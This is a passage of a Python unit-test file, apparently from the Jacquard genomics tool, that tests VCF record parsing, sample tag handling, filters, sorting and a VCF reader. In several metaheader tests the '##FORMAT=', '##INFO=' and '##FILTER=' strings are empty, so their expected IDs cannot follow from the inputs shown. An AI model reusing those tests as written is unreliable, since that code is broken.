key_value\n\n return info_dict\n\n @property\n def format_tags(self):\n \"\"\"Returns set of format tags.\"\"\"\n tags = VcfRecord._EMPTY_SET\n if self.sample_tag_values:\n first_sample = list(self.sample_tag_values.keys())[0]\n tags = set(self.sample_tag_values[first_sample].keys())\n return tags\n\n def add_sample_tag_value(self, tag_name, new_sample_values):\n for sample in self.sample_tag_values.keys():\n value = str(new_sample_values[sample])\n self.sample_tag_values[sample][tag_name] = value\n\n def text(self):\n stringifier = [self.chrom, self.pos, self.id, self.ref, self.alt,\n self.qual, self.filter, self.info,\n \":\".join(self.format_set)]\n\n for key in self.sample_tag_values:\n stringifier.append(\":\".join(self.sample_tag_values[key].values()))\n\n return \"\\t\".join(stringifier) + \"\\n\"\n\n def __eq__(self, other):\n return (\"^\".join([self.chrom,\n self.pos,\n self.ref,\n self.alt]) == other)\n\nclass MockTag(object):\n def __init__(self, field_name=None, sample_values=None, metaheader=None):\n self.field_name = field_name\n if sample_values:\n self.sample_values = sample_values\n else:\n self.sample_values = {}\n if metaheader:\n self.metaheader = metaheader\n else:\n self.metaheader = []\n\n def add_tag_values(self, vcf_record):\n vcf_record.add_sample_tag_value(self.field_name, self.sample_values)\n\n#TODO: (cgates) Fix tests to not use parse_record() and text().\nclass VcfRecordTestCase(test_case.JacquardBaseTestCase):\n def test_parse_record(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO:BAR|SA_foo:SA_bar|SB_foo:SB_bar\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(\"CHROM\", record.chrom)\n 
self.assertEquals(\"POS\", record.pos)\n self.assertEquals(\"ID\", record.vcf_id)\n self.assertEquals(\"REF\", record.ref)\n self.assertEquals(\"ALT\", record.alt)\n self.assertEquals(\"QUAL\", record.qual)\n self.assertEquals(\"FILTER\", record.filter)\n self.assertEquals(\"INFO\", record.info)\n\n def test_parse_record_removesNewlines(self):\n sample_names = [\"SampleA\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO:BAR|SB_foo:SB_bar\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(\"SB_bar\", record.sample_tag_values[\"SampleA\"][\"BAR\"])\n\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO:BAR|SB_foo:SB_bar\\r\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(\"SB_bar\", record.sample_tag_values[\"SampleA\"][\"BAR\"])\n\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO:BAR|SB_foo:SB_bar\\r\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(\"SB_bar\", record.sample_tag_values[\"SampleA\"][\"BAR\"])\n\n def test_format_tags(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(set([\"F1\", \"F2\", \"F3\"]), record.format_tags)\n\n def test_format_tags_emptyWhenNoSamples(self):\n sample_names = []\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(set(), record.format_tags)\n\n def test_format_field(self):\n sample_names = [\"SA\", \"SB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F3:F1:F2|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals([\"F3\", \"F1\", \"F2\"], list(record._format_tag_fields()))\n\n def test_format_field_emptyWhenNoSamples(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO\\n\")\n record = VcfRecord.parse_record(input_line, [])\n self.assertEquals([], record._format_tag_fields())\n\n def test_format_field_preservesOrderWhenAddingNewTags(self):\n sample_names = [\"SA\", \"SB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F3:F1:F2|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n record.add_sample_tag_value(\"Z4\", {\"SA\" : \"SA.4\", \"SB\" : \"SB.4\"})\n record.add_sample_tag_value(\"A5\", {\"SA\" :\"SA.A5\", \"SB\" : \"SB.A5\"})\n self.assertEquals([\"F3\", \"F1\", \"F2\", \"Z4\", \"A5\"], list(record._format_tag_fields()))\n\n def test_parse_record_sample_dict(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals([\"SampleA\", \"SampleB\"],\n sorted(record.sample_tag_values.keys()))\n self.assertEquals({\"F1\":\"SA.1\", \"F2\":\"SA.2\", \"F3\":\"SA.3\"},\n record.sample_tag_values[\"SampleA\"])\n self.assertEquals({\"F1\":\"SB.1\", \"F2\":\"SB.2\", \"F3\":\"SB.3\"},\n record.sample_tag_values[\"SampleB\"])\n\n def test_sample_tag_values(self):\n sample_tag_values = VcfRecord._sample_tag_values([\"sampleA\", \"sampleB\"],\n \"foo:bar\",\n [\"SA_foo:SA_bar\", \"SB_foo:SB_bar\"])\n self.assertEquals({\"foo\":\"SA_foo\", \"bar\":\"SA_bar\"}, 
sample_tag_values[\"sampleA\"])\n self.assertEquals({\"foo\":\"SB_foo\", \"bar\":\"SB_bar\"}, sample_tag_values[\"sampleB\"])\n\n def test_sample_tag_values_emptyDictWhenExplicitNullSampleData(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|.|.|.\\n\")\n record = VcfRecord.parse_record(input_line, sample_names=[\"sampleA\", \"sampleB\"])\n self.assertEquals([\"sampleA\", \"sampleB\"],\n sorted(record.sample_tag_values.keys()))\n self.assertEquals({}, record.sample_tag_values[\"sampleA\"])\n self.assertEquals({}, record.sample_tag_values[\"sampleB\"])\n\n def test_sample_tag_values_whenSparseSampleData(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO|.|.\\n\")\n record = VcfRecord.parse_record(input_line, sample_names=[\"sampleA\", \"sampleB\"])\n self.assertEquals([\"sampleA\", \"sampleB\"],\n sorted(record.sample_tag_values.keys()))\n self.assertEquals(OrderedDict({\"FOO\":\".\"}),\n record.sample_tag_values[\"sampleA\"])\n self.assertEquals(OrderedDict({\"FOO\":\".\"}),\n record.sample_tag_values[\"sampleB\"])\n\n def test_sample_tag_values_emptyDictWhenNoSampleData(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|||\\n\")\n record = VcfRecord.parse_record(input_line,\n sample_names=[\"sampleA\", \"sampleB\"])\n self.assertEquals([\"sampleA\", \"sampleB\"],\n sorted(record.sample_tag_values.keys()))\n self.assertEquals({}, record.sample_tag_values[\"sampleA\"])\n self.assertEquals({}, record.sample_tag_values[\"sampleB\"])\n\n def test_sample_tag_values_emptyDictWhenNoSamples(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO\\n\")\n record = VcfRecord.parse_record(input_line, sample_names=[\"sampleA\", \"sampleB\"])\n self.assertEquals({}, record.sample_tag_values)\n\n def test_parse_record_initsSampleTagValues(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals([\"SampleA\", \"SampleB\"], sorted(record.sample_tag_values.keys()))\n self.assertEquals({\"F1\":\"SA.1\", \"F2\":\"SA.2\", \"F3\":\"SA.3\"}, record.sample_tag_values[\"SampleA\"])\n self.assertEquals({\"F1\":\"SB.1\", \"F2\":\"SB.2\", \"F3\":\"SB.3\"}, record.sample_tag_values[\"SampleB\"])\n\n def test_sample_tag_values_preservesSampleOrder(self):\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|||\\n\")\n record = VcfRecord.parse_record(input_line,\n sample_names=[\"sampleB\", \"sampleA\"])\n self.assertEquals([\"sampleA\", \"sampleB\"],\n sorted(record.sample_tag_values.keys()))\n\n def test_add_sample_format_value(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n record.add_sample_tag_value(\"inserted\", {\"SampleB\":\"insertedValueB\", \"SampleA\":\"insertedValueA\"})\n expected = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3:inserted|SA.1:SA.2:SA.3:insertedValueA|SB.1:SB.2:SB.3:insertedValueB\\n\")\n self.assertEquals(expected, record.text())\n\n def test_insert_format_field_failsOnInvalidSampleDict(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n 
self.assertRaises(KeyError, record.add_sample_tag_value, \"inserted\", {\"SampleA\":0.6})\n self.assertRaises(KeyError, record.add_sample_tag_value, \"inserted\", {\"SampleA\":0.6, \"SampleZ\":0.6})\n self.assertRaises(KeyError, record.add_sample_tag_value, \"inserted\", {\"SampleA\":0.6, \"SampleB\":0.6, \"SampleZ\":0.6})\n\n def test_insert_format_field_failsOnExistingField(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertRaises(KeyError, record.add_sample_tag_value, \"F1\", {\"SampleA\":0.6, \"SampleB\":0.6})\n\n def test_get_info_dict_empty(self):\n vcf_record = VcfRecord(\"chr1\", \"42\", \"A\", \"C\", info=\"\")\n self.assertEquals({}, vcf_record.info_dict)\n\n def test_get_info_dict_null(self):\n vcf_record = VcfRecord(\"chr1\", \"42\", \"A\", \"C\", info=\".\")\n self.assertEquals({}, vcf_record.info_dict)\n\n def test_add_info_field_assignedField(self):\n sample_names = [\"SampleA\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|k1=v1;k2=v2;baz|F|S\\n\")\n vcf_record = VcfRecord.parse_record(input_line, sample_names)\n vcf_record.add_info_field(\"foo=bar\")\n self.assertEquals({\"k1\": \"v1\", \"k2\": \"v2\", \"baz\": \"baz\", \"foo\": \"bar\"}, vcf_record.info_dict)\n\n def test_add_info_field_nonAssignedField(self):\n sample_names = [\"SampleA\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|k1=v1;k2=v2;baz|F|S\\n\")\n vcf_record = VcfRecord.parse_record(input_line, sample_names)\n vcf_record.add_info_field(\"foo\")\n self.assertEquals({\"k1\": \"v1\", \"k2\": \"v2\", \"baz\": \"baz\", \"foo\": \"foo\"}, vcf_record.info_dict)\n\n def test_join_info_fields_nullValues(self):\n sample_names = [\"SampleA\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|.|F|S\\n\")\n vcf_record = VcfRecord.parse_record(input_line, sample_names)\n vcf_record._join_info_fields()\n self.assertEquals(\".\", vcf_record.info)\n\n vcf_record = VcfRecord.parse_record(input_line, sample_names)\n vcf_record.add_info_field(\"foo\")\n vcf_record._join_info_fields()\n self.assertEquals(\"foo\", vcf_record.info)\n\n def test_join_info_fields_orderedCorrectly(self):\n vcf_record = VcfRecord(\"chr1\", \"2\", \"A\", \"G\", info=\"FOO;BAR;BAZ\")\n vcf_record._join_info_fields()\n self.assertEquals(\"FOO;BAR;BAZ\", vcf_record.info)\n\n def test_text(self):\n sampleA = OrderedDict(sorted({\"F1\":\"SA.1\", \"F2\":\"SA.2\", \"F3\":\"SA.3\"}.items()))\n sampleB = OrderedDict(sorted({\"F1\":\"SB.1\", \"F2\":\"SB.2\", \"F3\":\"SB.3\"}.items()))\n sample_tag_values = OrderedDict(sorted({\"SampleA\":sampleA, \"SampleB\":sampleB}.items()))\n record = VcfRecord(\"CHROM\", \"POS\", \"REF\", \"ALT\", \"ID\", \"QUAL\", \"FILTER\", \"INFO\", sample_tag_values)\n expected = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n self.assertEquals(expected, record.text())\n\n def test_asTextWhenEmptyFormatField(self):\n sampleA = OrderedDict({})\n sampleB = OrderedDict({})\n sample_tag_values = OrderedDict({\"SampleA\":sampleA, \"SampleB\":sampleB})\n record = VcfRecord(\"CHROM\", \"POS\", \"REF\", \"ALT\", \"ID\", \"QUAL\", \"FILTER\", \"INFO\", sample_tag_values)\n expected = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|.|.|.\\n\")\n self.assertEquals(expected, record.text())\n\n def test_asTextExpandsEmptyTrailingFormatField(self):\n sampleA = 
OrderedDict([('a','1'), ('b','2')])\n sampleB = OrderedDict([('a','10')])\n sample_tag_values = OrderedDict([(\"SampleA\", sampleA), (\"SampleB\", sampleB)])\n record = VcfRecord(\"CHROM\", \"POS\", \"REF\", \"ALT\", \"ID\", \"QUAL\", \"FILTER\", \"INFO\", sample_tag_values)\n expected = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|a:b|1:2|10:.\\n\")\n self.assertEquals(expected, record.text())\n\n def test_sample_field_whenInconsistentTags(self):\n # FYI this should never happen in the wild, but I wanted to test the exception formatting.\n sampleA = OrderedDict([('a','1'), ('b','2')])\n sampleB = OrderedDict([('a','10')])\n sample_tag_values = OrderedDict([(\"SampleA\", sampleA), (\"SampleB\", sampleB)])\n record = VcfRecord(\"CHROM\", \"POS\", \"REF\", \"ALT\", \"ID\", \"QUAL\", \"FILTER\", \"INFO\", sample_tag_values)\n\n self.assertRaisesRegexp(ValueError,\n r'CHROM:POS:REF:ALT|sample format tags are not consistent: requested tags \\[a\\] but sample has has tags \\[a=1, b=2\\] leaving behind \\[b\\]',\n record._sample_field,\n ['a'],\n 'SampleA')\n\n\n def test_equals(self):\n sample_names = [\"sampleA\"]\n base = VcfRecord.parse_record(self.entab(\"A|1|ID|C|D|QUAL|FILTER|INFO|F|S\\n\"), sample_names)\n base_equivalent = VcfRecord.parse_record(self.entab(\"A|1|ID|C|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertEquals(base, base_equivalent)\n different_chrom = VcfRecord.parse_record(self.entab(\"Z|1|ID|C|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertNotEquals(base, different_chrom)\n different_pos = VcfRecord.parse_record(self.entab(\"A|2|ID|C|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertNotEquals(base, different_pos)\n different_ref = VcfRecord.parse_record(self.entab(\"A|1|ID|Z|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertNotEquals(base, different_ref)\n different_alt = VcfRecord.parse_record(self.entab(\"A|1|ID|C|Z|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertNotEquals(base, different_alt)\n\n def testHash(self):\n sample_names = [\"sampleA\"]\n base = VcfRecord.parse_record(self.entab(\"A|B|ID|C|D|QUAL|FILTER|INFO|F|S\\n\"), sample_names)\n base_equivalent = VcfRecord.parse_record(self.entab(\"A|B|ID|C|D|QUAL|FILTER||foo|S\\n\"), sample_names)\n self.assertEquals(base.__hash__(), base_equivalent.__hash__())\n record_set = set()\n record_set.add(base)\n record_set.add(base_equivalent)\n self.assertEquals(1, len(record_set))\n\n def testCompare(self):\n sample_names = [\"SampleA\"]\n expected_records = [VcfRecord.parse_record(self.entab(\"1|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"1|1|ID|A|A|QUAL|FILTER||foo|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"1|1|ID|A|C|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"1|1|ID|C|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"1|2|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"2|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names)]\n\n input_records = expected_records[::-1]\n\n self.assertEquals(expected_records, sorted(input_records))\n\n def testCompare_orderingByNumericChromAndPos(self):\n sample_names = [\"SampleA\"]\n expected_records = [VcfRecord.parse_record(self.entab(\"1|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"2|1|ID|A|A|QUAL|FILTER||foo|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"10|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n 
VcfRecord.parse_record(self.entab(\"11|1|ID|C|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"20|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"M|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"X|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names)]\n\n input_records = expected_records[::-1]\n\n self.assertEquals(expected_records, sorted(input_records))\n\n def testCompare_nonNumericChrom(self):\n sample_names = [\"SampleA\"]\n expected_records = [VcfRecord.parse_record(self.entab(\"chr2|1|ID|A|A|QUAL|FILTER|INFO|F|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"chr5|1|ID|A|A|QUAL|FILTER||foo|S\\n\"), sample_names),\n VcfRecord.parse_record(self.entab(\"10|1|ID|A|C|QUAL|FILTER|INFO|F|S\\n\"), sample_names)]\n\n input_records = expected_records[::-1]\n\n self.assertEquals(expected_records, sorted(input_records))\n\n def test_empty_record(self):\n sample_names = [\"SampleA\"]\n base = VcfRecord.parse_record(self.entab(\"chr2|1|ID|A|C|QUAL|FILTER|INFO|F|S\\n\"), sample_names)\n\n empty_record = base.get_empty_record()\n\n expected_record = VcfRecord(chrom=\"chr2\", pos=\"1\", ref=\"A\", alt=\"C\")\n self.assertEquals(expected_record.text(), empty_record.text())\n\n def test_add_or_replace_filter_filterReplacesPassFilter(self):\n record = VcfRecord(\"chr1\", \"42\", \"X\", \"C\", vcf_filter=\"PASS\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_filterReplacesNullFilter(self):\n record = VcfRecord(\"chr1\", \"42\", \"X\", \"C\", vcf_filter=\".\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_filterReplacesEmptyFilter(self):\n record = VcfRecord(\"chr1\", \"42\", \"X\", \"C\", vcf_filter=\"\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_filterAppendsFailedFilter(self):\n record = VcfRecord(\"chr1\", \"42\", \"XYZ\", \"C\", vcf_filter=\"indelError\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"indelError;JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_duplicateFilterNotAdded(self):\n record = VcfRecord(\"chr1\", \"42\", \"XYZ\", \"C\", vcf_filter=\"JQ_EXCLUDE\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"JQ_EXCLUDE\", record.filter)\n\n def test_add_or_replace_filter_filtersOnlyAppendsUnique(self):\n record = VcfRecord(\"chr1\", \"42\", \"XYZ\", \"C\", vcf_filter=\"indelError\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n record.add_or_replace_filter(\"JQ_EXCLUDE\")\n self.assertEquals(\"indelError;JQ_EXCLUDE\", record.filter)\n\n\nclass VcfReaderTestCase(test_case.JacquardBaseTestCase):\n def setUp(self):\n self.output = StringIO()\n self.saved_stderr = sys.stderr\n sys.stderr = self.output\n\n def tearDown(self):\n self.output.close()\n sys.stderr = self.saved_stderr\n\n def test_init(self):\n file_contents = [\"##metaheader1\\n\",\n \"##metaheader2\\n\",\n \"#columnHeader\\n\",\n \"record1\\n\",\n \"record2\"]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n\n actual_vcf_reader = VcfReader(mock_reader)\n\n self.assertEquals(\"my_dir/my_file.txt\", actual_vcf_reader.input_filepath)\n self.assertEquals(\"my_file.txt\", actual_vcf_reader.file_name)\n self.assertEquals(\"#columnHeader\", 
actual_vcf_reader.column_header)\n self.assertEquals([\"##metaheader1\", \"##metaheader2\"], actual_vcf_reader.metaheaders)\n self.assertEquals([], actual_vcf_reader.sample_names)\n\n def test_init_sampleNamesInitialized(self):\n file_contents = [\"##metaheader1\\n\",\n \"##metaheader2\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleA|SampleB\\n\"),\n \"record1\\n\",\n \"record2\"]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n\n actual_vcf_reader = VcfReader(mock_reader)\n self.assertEquals([\"SampleA\", \"SampleB\"], actual_vcf_reader.sample_names)\n\n def test_format_metaheaders(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n expected_metaheaders = {\"AF\" : '##FORMAT=',\n \"DP\" : '##FORMAT='}\n\n self.assertEquals(expected_metaheaders, reader.format_metaheaders)\n\n def test_info_metaheaders(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##INFO=\\n\",\n \"##INFO=\\n\",\n \"##INFO=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|SNP;BAR|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|BAR|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n expected_metaheaders = {\"SNP\" : \"##INFO=\",\n \"FOO\" : \"##INFO=\",\n \"BAR\" : \"##INFO=\"}\n\n self.assertEquals(expected_metaheaders, reader.info_metaheaders)\n\n def test_filter_metaheaders(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##INFO=\\n\",\n \"##FILTER=\\n\",\n \"##FILTER=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n expected_metaheaders = {\".\" : \"##FILTER=\",\n \"PASS\" : \"##FILTER=\",}\n\n self.assertEquals(expected_metaheaders, reader.filter_metaheaders)\n\n def test_format_tag_ids_ignoresRelatedFieldNames(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n self.assertEquals(set([\"DP1\", \"DP2\", \"DP3\"]), set(reader.format_metaheaders.keys()))\n\n\n def test_format_tag_ids_idsAreUnique(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n self.assertEquals([\"AF\"], sorted(reader.format_metaheaders.keys()))\n 
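\n        # A minimal sketch (an illustrative assumption, not VcfReader's actual internals) of\n        # how duplicate FORMAT metaheader IDs can collapse into a unique {tag_id: metaheader}\n        # dict, which is the behaviour the surrounding assertions check; the regex and the\n        # example_headers / unique_metaheaders names exist only for this example.\n        import re\n        example_headers = ['##FORMAT=<ID=AF,Number=A>', '##FORMAT=<ID=AF,Number=1>']\n        unique_metaheaders = {}\n        for header in example_headers:\n            match = re.match(r'^##FORMAT=<ID=([^,>]+)', header)\n            if match:\n                unique_metaheaders[match.group(1)] = header # later duplicates overwrite earlier ones\n        assert sorted(unique_metaheaders.keys()) == ['AF']\n        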
self.assertEquals(\"##FORMAT=\", reader.format_metaheaders[\"AF\"])\n\n def test_format_tag_ids_emptyWhenNoFormatTags(self):\n file_contents = [\"##metaheader1\\n\",\n \"##INFO=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n self.assertEquals(0, len(reader.format_metaheaders))\n\n def test_format_tag_ids_immutable(self):\n file_contents = [\"##metaheader1\\n\",\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n self.assertEquals([\"DP\"], sorted(reader.format_metaheaders.keys()))\n del reader.format_metaheaders[\"DP\"]\n self.assertEquals([\"DP\"], sorted(reader.format_metaheaders.keys()))\n\n def test_sort_delegatesToFileReader(self):\n _FILE_CONTENTS = [\n \"##FORMAT=\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),]\n\n class ReversedSortMockFileReader(MockFileReader):\n def __init__(self, filename):\n MockFileReader.__init__(self, filename, _FILE_CONTENTS)\n self.filename = filename\n def __lt__(self, other):\n return self.filename > other.filename\n\n reader1 = VcfReader(ReversedSortMockFileReader(\"1.txt\"))\n reader2 = VcfReader(ReversedSortMockFileReader(\"2.txt\"))\n reader3 = VcfReader(ReversedSortMockFileReader(\"3.txt\"))\n\n actual_readers = sorted([reader1, reader2, reader3])\n\n self.assertEquals([reader3, reader2, reader1], actual_readers)\n\n def test_vcf_records(self):\n file_contents = [\"##metaheader1\\n\",\n \"##metaheader2\\n\",\n self.entab(\"#CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FORMAT|SampleNormal|SampleTumor\\n\"),\n self.entab(\"chr1|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\\n\"),\n self.entab(\"chr2|1|.|A|C|.|.|INFO|FORMAT|NORMAL|TUMOR\")]\n mock_reader = MockFileReader(\"my_dir/my_file.txt\", file_contents)\n reader = VcfReader(mock_reader)\n\n actual_vcf_records = []\n reader.open()\n for vcf_record in reader.vcf_records():\n actual_vcf_records.append(vcf_record)\n reader.close()\n\n self.assertEquals(2, len(actual_vcf_records))\n self.assertEquals('chr1', actual_vcf_records[0].chrom)\n self.assertEquals('chr2', actual_vcf_records[1].chrom)\n self.assertTrue(mock_reader.open_was_called)\n 